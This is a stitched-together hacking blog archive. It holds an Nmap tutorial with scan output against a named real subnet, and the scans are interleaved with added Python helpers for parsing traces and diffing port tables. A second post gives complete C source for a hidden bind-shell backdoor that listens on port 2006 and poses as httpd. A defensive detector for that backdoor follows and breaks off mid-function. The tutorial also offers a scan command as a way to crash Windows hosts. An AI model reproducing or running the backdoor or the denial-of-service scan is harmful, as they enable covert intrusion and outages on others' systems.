
Nmap Tutorial
Written 18 December 2005 in Hacking at 16:08 → 10 bloggers commented
Nmap is a network exploration tool; it has become one of the standard tools used by network administrators, pen-testers (IT professionals paid to find holes in a network's systems) and attackers alike.
The tool does what its name says: it is a network mapper (Network Mapper, Network Exploration Tool). With Nmap you can probe a whole network and find out which services are active on specific ports. Not only that, it also includes fingerprinting (banner grabbing) that compares responses and gives an estimate of the target's operating system (OS). Nmap also has many options, or flags, that change how it performs the scan: you can run a TCP connect() scan, which makes a full connection to the host, or a SYN scan, also known (a.k.a.) as a half-open connection (half connection is hard to explain here); test a firewall, or find out whether there is a firewall or packet filter at all; run an idle scan (the discussion of idle scans will have to wait for the next e-zine :d), which spoofs (hides) your IP behind another host; or use decoys (bait hosts), which make your trace harder to follow.
Nmap works on the Linux/BSD family (*nix) and on W*ndows; although I will explain Nmap from Linux, the W*ndows version is the same as the Linux one.
Extra: I am using the Debian Linux distribution and Nmap v3.50 (http://www.insecure.org)
/* Options and Flags */
Nmap 3.50 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service & app names/versions
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.host-target.com 192.168.0.0/16 '192.88-90.*.*'
*****************************************************
* Syn/Stealth Scanning. -sS TCP SYN stealth port scan
*****************************************************
cyberzone:/home/vQ# nmap -sS 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 15:37 WIT
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1636 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
199/tcp open smux
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
593/tcp filtered http-rpc-epmap
993/tcp open imaps
995/tcp open pop3s
3128/tcp open squid-http
3306/tcp open mysql
6000/tcp open X11
Nmap run completed -- 1 IP address (1 host up) scanned in 115.478 seconds
** Note that ports 135, 137, 138, 139, 445 and 593 are filtered; filtered ports usually mean the host is running a firewall. **
******************************************************
* TCP()Connect Scanning. -sT TCP connect() port scan
******************************************************
cyberzone:/home/vQ# nmap -sT 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 15:50 WIT
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1636 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
199/tcp open smux
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
593/tcp filtered http-rpc-epmap
993/tcp open imaps
995/tcp open pop3s
3128/tcp open squid-http
3306/tcp open mysql
6000/tcp open X11
Nmap run completed -- 1 IP address (1 host up) scanned in 41.839 seconds
Another thing you can do with -sT scanning is DoS (denial of service) a host,
as in the example below.....
cyberzone:/home/vQ# nmap -T 5 -M 1000 -sT 203.130.254.xx
Warning: Your max_parallelism (-M) option is absurdly high! Don't complain to Fyodor if all hell breaks loose!
Since the target already uses Stack-Guard, no damage occurred; but if you do this to a host running W*ndows XP there is a 95% chance it will crash. If you look closely, I passed nmap -T 5 -M 1000: the -M flag sets the maximum number of sockets Nmap uses in parallel, and 60 sockets already counts as a lot (and above I used 1000!! but it is very effective....)
The -T flag sets Nmap's scan speed: 0 is the slowest and 5 the fastest.
0 = Paranoid: tries to evade IDS detection, no parallel scanning, waits 5 minutes before sending each packet, so.... it really is f*cking slow!
1 = Sneaky: also tries to evade IDS detection, no parallel scanning, waits 15 seconds before sending each packet...
2 = Polite: still very slow, will be detected by every kind of IDS. Waits about 0.4 seconds per packet; roughly 1 second/packet.
3 = Normal: Nmap's standard scan speed, i.e. scanning as fast as possible without risking a DoS.
4 = Aggressive: very good on fast networks (high-speed broadband); able to get through firewalls and filtered networks.
5 = Insane a.k.a. GeNdHeNg (crazy): you will lose some information; recommended for network sweeping.
********************************************
* UDP scan -sU UDP port scan
********************************************
cyberzone:/home/vQ# nmap -sU 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 16:17 WIT
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1463 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
53/udp open domain
69/udp filtered tftp
111/udp open rpcbind
135/udp filtered msrpc
137/udp filtered netbios-ns
138/udp open netbios-dgm
139/udp filtered netbios-ssn
161/udp open snmp
162/udp open snmptrap
445/udp filtered microsoft-ds
1434/udp filtered ms-sql-m
3130/udp open squid-ipc
3401/udp open squid-snmp
32768/udp open omad
32770/udp open sometimes-rpc4
Nmap run completed -- 1 IP address (1 host up) scanned in 2112.724 seconds
But usually there are also hosts running a firewall, so probing over UDP will not succeed; when that happens there is yet another way.....
Pinging: -sP ping scan (sweeping for live hosts)
cyberzone:/home/vQ# nmap --packet_trace -sP 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:11 WIT
SENT (0.0190s) ICMP 202.148.13.xx > 203.130.254.xx Echo request (type=8/code=0) ttl=42 id=17732 iplen=28
SENT (0.0190s) TCP 202.148.13.xx:59530 > 203.130.254.xx:80 A ttl=51 id=7528 iplen=40 seq=750241886 win=4096 ack=750241886
RCVD (1.3770s) ICMP 203.130.254.xx > 202.148.13.xx Echo reply (type=0/code=0) ttl=55 id=26445 iplen=28
Host xx.subnet254.astinet.telkom.net.id (203.130.254.xx) appears to be up.
Nmap run completed -- 1 IP address (1 host up) scanned in 12.340 seconds
However, some hosts block ping, since that is considered fairly effective for hiding (cloaking) their servers.
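The --packet_trace run above shows what Nmap's ping scan actually sends: an ICMP echo request and a TCP ACK to port 80, so a host that drops ICMP can still give itself away by answering the ACK with a RST. The following is an added example, not code from the post: it parses SENT/RCVD trace lines, pairs each probe type with a reply from the target, and reports which probe proved the host up. The first trace is the three lines from the scan above; the second trace (192.0.2.10 / 198.51.100.7) is constructed to show the "ping blocked, ACK answered" case.

```python
import re
from collections import defaultdict

# The three --packet_trace lines from the ping scan in this post (xx kept as in the post).
PAGE_TRACE = """\
SENT (0.0190s) ICMP 202.148.13.xx > 203.130.254.xx Echo request (type=8/code=0) ttl=42 id=17732 iplen=28
SENT (0.0190s) TCP 202.148.13.xx:59530 > 203.130.254.xx:80 A ttl=51 id=7528 iplen=40 seq=750241886 win=4096 ack=750241886
RCVD (1.3770s) ICMP 203.130.254.xx > 202.148.13.xx Echo reply (type=0/code=0) ttl=55 id=26445 iplen=28
"""

# Constructed trace (not from the post): the target drops ICMP but answers the
# TCP ACK probe with a RST, so it is still reported as up.
CLOAKED_TRACE = """\
SENT (0.0200s) ICMP 192.0.2.10 > 198.51.100.7 Echo request (type=8/code=0) ttl=44 id=1001 iplen=28
SENT (0.0200s) TCP 192.0.2.10:40001 > 198.51.100.7:80 A ttl=49 id=1002 iplen=40 seq=1 win=4096 ack=1
RCVD (0.2100s) TCP 198.51.100.7:80 > 192.0.2.10:40001 R ttl=57 id=0 iplen=40 seq=1 win=0
"""

# direction, timestamp, protocol, source, destination, remainder of the line
LINE = re.compile(r"^(SENT|RCVD) \(([\d.]+)s\) (ICMP|TCP|UDP) (\S+) > (\S+) (.*)$")


def host(addr):
    """Strip a trailing :port from an IPv4 address as printed by packet_trace."""
    return addr.rsplit(":", 1)[0] if ":" in addr else addr


def parse_trace(text):
    """Return one dict per SENT/RCVD line; other output lines are ignored."""
    pkts = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        direction, t, proto, src, dst, info = m.groups()
        pkts.append({"dir": direction, "t": float(t), "proto": proto,
                     "src": src, "dst": dst, "info": info})
    return pkts


def probe_results(text):
    """Map (target, protocol) of every probe sent to True if the target answered it."""
    pkts = parse_trace(text)
    results = {}
    for p in pkts:
        if p["dir"] == "SENT":
            results.setdefault((host(p["dst"]), p["proto"]), False)
    for p in pkts:
        key = (host(p["src"]), p["proto"])
        if p["dir"] == "RCVD" and key in results:
            results[key] = True  # any reply from the target to that probe type counts
    return results


def hosts_up(text):
    """Hosts that answered at least one probe, with the protocols that gave them away."""
    up = defaultdict(list)
    for (h, proto), answered in probe_results(text).items():
        if answered:
            up[h].append(proto)
    return dict(up)


if __name__ == "__main__":
    print("post trace:", hosts_up(PAGE_TRACE))
    print("constructed trace:", hosts_up(CLOAKED_TRACE))
```

For the trace from the post only the ICMP probe is answered; for the constructed trace only the TCP probe is, which is the practical caveat behind the sentence above: filtering ICMP alone does not hide a host from a ping scan that also sends TCP probes.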
The basic technique for seeing which hosts are up.
cyberzone:/home/vQ# nmap -sP 203.130.254.*
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:20 WIT
Host 1.subnet254.astinet.telkom.net.id (203.130.254.1) appears to be up.
Host 5.subnet254.astinet.telkom.net.id (203.130.254.5) appears to be up.
Host 16.subnet254.astinet.telkom.net.id (203.130.254.16) appears to be up.
Host 17.subnet254.astinet.telkom.net.id (203.130.254.17) appears to be up.
Host 29.subnet254.astinet.telkom.net.id (203.130.254.29) appears to be up.
Host 31.subnet254.astinet.telkom.net.id (203.130.254.31) appears to be up.
Host 32.subnet254.astinet.telkom.net.id (203.130.254.32) seems to be a subnet broadcast address (returned 1 extra pings). Note -- the actual IP also responded.
Host 36.subnet254.astinet.telkom.net.id (203.130.254.36) appears to be up.
Host 37.subnet254.astinet.telkom.net.id (203.130.254.37) appears to be up.
Host 47.subnet254.astinet.telkom.net.id (203.130.254.47) seems to be a subnet broadcast address (returned 1 extra pings). Note -- the actual IP also responded.
Host 48.subnet254.astinet.telkom.net.id (203.130.254.48) appears to be up.
Host 49.subnet254.astinet.telkom.net.id (203.130.254.49) appears to be up.
Host 63.subnet254.astinet.telkom.net.id (203.130.254.63) appears to be up.
Host 65.subnet254.astinet.telkom.net.id (203.130.254.65) appears to be up.
Host 68.subnet254.astinet.telkom.net.id (203.130.254.68) appears to be up.
Host 69.subnet254.astinet.telkom.net.id (203.130.254.69) appears to be up.
Host 81.subnet254.astinet.telkom.net.id (203.130.254.81) appears to be up.
Host 96.subnet254.astinet.telkom.net.id (203.130.254.96) appears to be up.
Host 97.subnet254.astinet.telkom.net.id (203.130.254.97) appears to be up.
Host 111.subnet254.astinet.telkom.net.id (203.130.254.111) appears to be up.
Host 203.130.254.128 appears to be up.
Host 129.subnet254.astinet.telkom.net.id (203.130.254.129) appears to be up.
Host 130.subnet254.astinet.telkom.net.id (203.130.254.130) appears to be up.
Host 131.subnet254.astinet.telkom.net.id (203.130.254.131) appears to be up.
Host 142.subnet254.astinet.telkom.net.id (203.130.254.142) appears to be up.
Host 143.subnet254.astinet.telkom.net.id (203.130.254.143) appears to be up.
Host 203.130.254.160 appears to be up.
Host 203.130.254.161 appears to be up.
Host 203.130.254.162 appears to be up.
Host 203.130.254.163 appears to be up.
Host 203.130.254.164 appears to be up.
Host 203.130.254.165 appears to be up.
Host 203.130.254.166 appears to be up.
Host 203.130.254.167 appears to be up.
Host 203.130.254.168 appears to be up.
Host 203.130.254.169 appears to be up.
Host 203.130.254.170 appears to be up.
Host 203.130.254.171 appears to be up.
Host 203.130.254.172 appears to be up.
Host 203.130.254.173 appears to be up.
Host 203.130.254.174 appears to be up.
Host 203.130.254.175 appears to be up.
Host 203.130.254.176 appears to be up.
Host 179.subnet254.astinet.telkom.net.id (203.130.254.179) appears to be up.
Host 180.subnet254.astinet.telkom.net.id (203.130.254.180) appears to be up.
Host 183.subnet254.astinet.telkom.net.id (203.130.254.183) appears to be up.
Host 191.subnet254.astinet.telkom.net.id (203.130.254.191) appears to be up.
Host telkomgw.stikom.edu (203.130.254.193) appears to be up.
Host 203.130.254.194 appears to be up.
Host ambrosia.stikom.edu (203.130.254.195) appears to be up.
Host omega.stikom.edu (203.130.254.196) appears to be up.
Host download.stikom.edu (203.130.254.197) appears to be up.
Host 203.130.254.199 appears to be up.
Host 203.130.254.200 appears to be up.
Host 215.subnet254.astinet.telkom.net.id (203.130.254.215) appears to be up.
Nmap run completed -- 256 IP addresses (55 hosts up) scanned in 335.697 seconds
*******************************************
* Ftp Bounce Attack -b
********************************************
[Interesting but useless]
cyberzone:/home/vQ# nmap -b 203.130.254.xx 203.130.254.xx
Hint: if your bounce scan target hosts aren't reachable from here, remember to use -P0 so we don't try and ping them prior to the scan
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:44 WIT
Your ftp bounce proxy server won't talk to us!
This is what you will get from every FTP server you scan!!
/* Closing */
There are actually many more techniques you can use, depending on your creativity; as an extra, here is one of the combo scans I usually run....
cyberzone:/home/vicky# nmap -v -sS -sV -O -v 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:52 WIT
Host xx.subnet254.astinet.telkom.net.id (203.130.254.xx) appears to be up … good.
Initiating SYN Stealth Scan against xx.subnet254.astinet.telkom.net.id (203.130.254.xx) at 17:52
Adding open port 110/tcp
Adding open port 6000/tcp
Adding open port 995/tcp
adjust_timeout: packet supposedly had rtt of 12210894 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13126862 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13696829 microseconds. Ignoring time.
Adding open port 80/tcp
adjust_timeout: packet supposedly had rtt of 25753793 microseconds. Ignoring time.
Adding open port 3306/tcp
adjust_timeout: packet supposedly had rtt of 25845379 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 26664043 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13675951 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13597619 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27226534 microseconds. Ignoring time.
Adding open port 53/tcp
adjust_timeout: packet supposedly had rtt of 51264396 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27144765 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 51336689 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52158192 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13717478 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52711309 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27273293 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52631826 microseconds. Ignoring time.
Adding open port 993/tcp
adjust_timeout: packet supposedly had rtt of 13668042 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 100643854 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52756355 microseconds. Ignoring time.
Adding open port 22/tcp
adjust_timeout: packet supposedly had rtt of 99334735 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27012389 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 101595861 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13831231 microseconds. Ignoring time.
Adding open port 443/tcp
adjust_timeout: packet supposedly had rtt of 100721309 microseconds. Ignoring time.
Adding open port 25/tcp
adjust_timeout: packet supposedly had rtt of 102030144 microseconds. Ignoring time.
Adding open port 587/tcp
adjust_timeout: packet supposedly had rtt of 27349002 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 10864537 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 51118187 microseconds. Ignoring time.
Adding open port 199/tcp
Adding open port 3128/tcp
adjust_timeout: packet supposedly had rtt of 11560500 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 10717091 microseconds. Ignoring time.
Adding open port 465/tcp
Adding open port 143/tcp
Adding open port 21/tcp
adjust_timeout: packet supposedly had rtt of 24399319 microseconds. Ignoring time.
Adding open port 111/tcp
adjust_timeout: packet supposedly had rtt of 11045019 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 10938220 microseconds. Ignoring time.
The SYN Stealth Scan took 174 seconds to scan 1659 ports.
Initiating service scan against 17 services on 1 host at 17:55
The service scan took 38 seconds to scan 17 services on 1 host.
Initiating RPCGrind Scan against xx.subnet254.astinet.telkom.net.id (203.130.254.xx) at 17:56
The RPCGrind Scan took 3 seconds to scan 1 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1636 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
21/tcp open ftp vsFTPd 1.1.0
22/tcp open ssh OpenSSH 3.4p1 (protocol 1.99)
25/tcp open smtp
53/tcp open domain ISC Bind 9.2.1
80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
110/tcp open pop3 Courier pop3d
111/tcp open rpcbind 2 (rpc #100000)
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap Courier IMAP4rev1 1.7.X
199/tcp open smux Linux SNMP multiplexer
443/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
445/tcp filtered microsoft-ds
465/tcp open ssl OpenSSL
587/tcp open smtp Courier smtpd
593/tcp filtered http-rpc-epmap
993/tcp open ssl OpenSSL
995/tcp open ssl OpenSSL
3128/tcp open http-proxy Squid webproxy 2.4.STABLE7
3306/tcp open mysql?
6000/tcp open X11 (access denied)
1 service unrecognized despite returning data. If you know the service/version,
please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi:
SF-Port25-TCP:V=3.50%D=6/24%Time=40DAB33B%P=i686-pc-linux-gnu%r(Help,1C,"2
SF:20\x20mail\.jombang\.org\x20ESMTP\r\n");
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.6 - 2.4.21, Linux Kernel 2.4.19 - 2.4.20, Linux 2.4.21 (X86)
OS Fingerprint:
T1(Resp=N)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN
=134%DAT=E)
Nmap run completed -- 1 IP address (1 host up) scanned in 256.323 seconds
If you look above, I used the -v flag twice; as Fyodor (Nmap's author) recommends, -v (verbose) is best given twice to increase its accuracy..... then the -sV flag to guess the service running on each open port, and the -O flag to guess the operating system (OS), a.k.a. OS fingerprinting.
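Two things in this post lend themselves to a small tool: the remark in the -sS section that filtered ports point to a firewall, and the PORT STATE SERVICE VERSION table that -sV produces in the combo scan above. The following is an added example, not code from the post or from the Nmap project: it parses Nmap's normal-output port table (with or without the VERSION column), summarises ports by state, applies the filtered-means-firewalled rule of thumb, and diffs two scans so that an administrator can spot drift from a baseline. The two excerpts embedded below are lines from the -sS and -sS -sV -O outputs in this post; the 8080/tcp line in the second excerpt is constructed to show what a newly exposed port looks like in the diff.

```python
import re
from dataclasses import dataclass

# Excerpt of the -sS output from this post (no VERSION column).
SYN_SCAN = """\
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
3306/tcp open mysql
6000/tcp open X11
"""

# Excerpt of the -sS -sV -O output from this post, plus one constructed
# line (8080/tcp) that does not appear in the post.
VERSION_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsFTPd 1.1.0
22/tcp open ssh OpenSSH 3.4p1 (protocol 1.99)
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
3306/tcp open mysql?
6000/tcp open X11 (access denied)
8080/tcp open http-proxy
"""

# port/proto, state, service name, optional free-text version
PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(open\|filtered|open|closed|filtered)\s+(\S+)(?:\s+(.*))?$"
)


@dataclass(frozen=True)
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str  # empty string when the scan had no -sV column


def parse_port_table(text):
    """Return {(port, proto): PortEntry} for every port line in Nmap normal output."""
    entries = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header, blank and summary lines are skipped
        port, proto, state, service, version = m.groups()
        entries[(int(port), proto)] = PortEntry(
            int(port), proto, state, service, (version or "").strip()
        )
    return entries


def summarize(entries):
    """Group port numbers by state, e.g. {'open': [...], 'filtered': [...]}."""
    by_state = {}
    for e in entries.values():
        by_state.setdefault(e.state, []).append(e.port)
    return {state: sorted(ports) for state, ports in by_state.items()}


def likely_firewalled(entries):
    """The post's rule of thumb: a 'filtered' port means something dropped the probe."""
    return any(e.state == "filtered" for e in entries.values())


def diff_scans(baseline, current):
    """List (kind, (port, proto), detail) for every difference between two scans."""
    changes = []
    for key in sorted(set(baseline) | set(current)):
        old, new = baseline.get(key), current.get(key)
        if old is None:
            changes.append(("new", key, new.state))
        elif new is None:
            changes.append(("gone", key, old.state))
        elif old.state != new.state:
            changes.append(("state", key, f"{old.state} -> {new.state}"))
        elif old.version != new.version:
            changes.append(("version", key, f"{old.version!r} -> {new.version!r}"))
    return changes


if __name__ == "__main__":
    base, cur = parse_port_table(SYN_SCAN), parse_port_table(VERSION_SCAN)
    print("baseline:", summarize(base), "firewalled:", likely_firewalled(base))
    for change in diff_scans(base, cur):
        print(change)
```

Run against a saved -oN file from a previous week, the diff shows exactly the kind of change worth a ticket: a port that went from filtered to open, a version string that changed after an upgrade, or a listener nobody knew about.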

Backdoor Bindtty
Written 29 October 2005 in Hacking at 16:14 → Go ahead and comment
How to hide a backdoor running in the background
Exploit:
/*
BindTTY.c
CreaTed By someONE
i just ModiFY..
Open TelnET with PasSWord,
Stealth BAckGround Proses..
compiled with : gcc -o bind.c bind
just simple run ./bind
for more 'secure'
1. mv bind httpd
2. ./httpd
3. ps -A
Can u See Your BackDoor? ^^
4. but i dont know how to hide in /etc/services?
SomeONE know?
*/
#define HOME "/"
#define TIOCSCTTY 0x540E
#define TIOCGWINSZ 0x5413
#define TIOCSWINSZ 0x5414
#define ECHAR 0x1d
#define PORT 2006
#define BUF 32768
#define proc "/usr/sbin/httpd" /* Change this for the fake background process name */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct winsize {
unsigned short ws_row;
unsigned short ws_col;
unsigned short ws_xpixel;
unsigned short ws_ypixel;
};
int sc;
char passwd[] = "cantik"; /* Change the password */
char motd[] = "=- Arai PriVAte BaCkd00r #jambihackerlink-=\n";
void cb_shell() {
char buffer[150];
write(sc, "Password: ", 10);
read(sc, buffer, sizeof(buffer));
if (!strncmp(buffer, passwd, strlen(passwd))) {
write(sc, motd, sizeof(motd));
}
else {
write(sc, "DiE!!!\n", 7);
close(sc); exit(0);
}
}
/* creates tty/pty name by index */
void get_tty(int num, char *base, char *buf)
{
char series[] = "pqrstuvwxyzabcde";
char subs[] = "0123456789abcdef";
int pos = strlen(base);
strcpy(buf, base);
buf[pos] = series[(num >> 4) & 0xF];
buf[pos+1] = subs[num & 0xF];
buf[pos+2] = 0;
}
/* search for free pty and open it */
int open_tty(int *tty, int *pty)
{
char buf[512];
int i, fd;
fd = open("/dev/ptmx", O_RDWR);
close(fd);
for (i=0; i < 256; i++) {
get_tty(i, "/dev/pty", buf);
*pty = open(buf, O_RDWR);
if (*pty < 0) continue;
get_tty(i, "/dev/tty", buf);
*tty = open(buf, O_RDWR);
if (*tty < 0) {
close(*pty);
continue;
}
return 1;
}
return 0;
}
/* to avoid creating zombies ;) */
void sig_child(int i)
{
signal(SIGCHLD, sig_child);
waitpid(-1, NULL, WNOHANG);
}
void hangout(int i)
{
kill(0, SIGHUP);
kill(0, SIGTERM);
}
int main (int argc, char *argv[])
{
int pid;
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;
char cmd[256];
strcpy (argv[0], proc);
signal (SIGCHLD, SIG_IGN);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror("socket");
return 1;
}
bzero((char *) &serv, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl(INADDR_ANY);
serv.sin_port = htons(PORT);
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
perror("bind");
return 1;
}
if (listen(sock, 5) < 0) {
perror("listen");
return 1;
}
printf("Arai BackDoor is starting..."); fflush(stdout);
pid = fork();
if (pid !=0 ) {
printf("OK, pid = %d\n", pid);
printf("#jambihackerlink Private BackD00r..\n");
return 0;
}
/* daemonize */
setsid();
chdir("/");
pid = open("/dev/null", O_RDWR);
dup2(pid, 0);
dup2(pid, 1);
dup2(pid, 2);
close(pid);
signal(SIGHUP, SIG_IGN);
signal(SIGCHLD, sig_child);
while (1) {
int scli;
int slen;
slen = sizeof(cli);
scli = accept(sock, (struct sockaddr *) &cli, &slen);
if (scli < 0) continue;
pid = fork();
if (pid == 0) {
int subshell;
int tty;
int pty;
fd_set fds;
char buf[BUF];
char *argv[] = {"sh", "-i", NULL};
#define MAXENV 256
#define ENVLEN 256
char *envp[MAXENV];
char envbuf[(MAXENV+2) * ENVLEN];
int j, i;
char home[256];
/* setup environment */
envp[0] = home;
sprintf(home, "HOME=%s", HOME);
j = 0;
do {
i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
envp[j+1] = &envbuf[j * ENVLEN];
j++;
if ((j >= MAXENV) || (i < ENVLEN)) break;
} while (envbuf[(j-1) * ENVLEN] != '\n');
envp[j+1] = NULL;
/* create new group */
setpgid(0, 0);
/* open slave & master side of tty */
if (!open_tty(&tty, &pty)) {
char msg[] = "Can't fork pty, bye!\n";
write(scli, msg, strlen(msg));
close(scli);
exit(0);
}
/* fork child */
subshell = fork();
if (subshell == 0) {
/* close master */
close(pty);
/* attach tty */
setsid();
ioctl(tty, TIOCSCTTY);
/* close local part of connection */
close(scli);
close(sock);
signal(SIGHUP, SIG_DFL);
signal(SIGCHLD, SIG_DFL);
dup2(tty, 0);
dup2(tty, 1);
dup2(tty, 2);
close(tty);
cb_shell();
execve("/bin/sh", argv, envp);
}
/* close slave */
close(tty);
signal(SIGHUP, hangout);
signal(SIGTERM, hangout);
while (1) {
/* watch tty and client side */
FD_ZERO(&fds);
FD_SET(pty, &fds);
FD_SET(scli, &fds);
if (select((pty > scli) ? (pty+1) : (scli+1),
&fds, NULL, NULL, NULL) < 0)
{
break;
}
if (FD_ISSET(pty, &fds)) {
int count;
count = read(pty, buf, BUF);
if (count <= 0) break;
if (write(scli, buf, count) <= 0) break;
}
if (FD_ISSET(scli, &fds)) {
int count;
unsigned char *p, *d;
d = buf;
count = read(scli, buf, BUF);
if (count <= 0) break;
/* setup win size */
p = memchr(buf, ECHAR, count);
if (p) {
unsigned char wb[5];
int rlen = count - ((ulong) p - (ulong) buf);
struct winsize ws;
/* wait for rest */
if (rlen > 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < 5) {
read(scli, &wb[rlen], 5 - rlen);
}
/* setup window */
ws.ws_xpixel = ws.ws_ypixel = 0;
ws.ws_col = (wb[1] << 8) + wb[2];
ws.ws_row = (wb[3] << 8) + wb[4];
ioctl(pty, TIOCSWINSZ, &ws);
kill(0, SIGWINCH);
/* write the rest */
write(pty, buf, (ulong) p - (ulong) buf);
rlen = ((ulong) buf + count) - ((ulong)p+5);
if (rlen > 0) write(pty, p+5, rlen);
} else
if (write(pty, d, count) <= 0) break;
}
}
close(scli);
close(sock);
close(pty);
waitpid(subshell, NULL, 0);
vhangup();
exit(0);
}
close(scli);
}
}
/* EOF */
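The hiding trick in the source above is that `main` overwrites `argv[0]` with `proc` ("/usr/sbin/httpd"), so `ps -A` shows a web server, while the listener sits on TCP port 2006. Both leave traces that do not depend on the process name: on Linux, `/proc/<pid>/exe` still links to the binary that was actually executed, and `/proc/net/tcp` lists the listening socket. The following is an added example written for this page, not code from the post: it flags processes whose `argv[0]` disagrees with their `exe` link and extracts LISTEN-state ports from a `/proc/net/tcp` table. The fake `/proc` tree and the `/proc/net/tcp` text are constructed (the `/home/vQ/bind` path and the pids are invented); run `argv0_mismatches()` with no argument to check the real `/proc`, which needs root to read other users' `exe` links.

```python
import os
import tempfile


def normalize(name):
    """Reduce an argv[0] or exe path to a comparable program name."""
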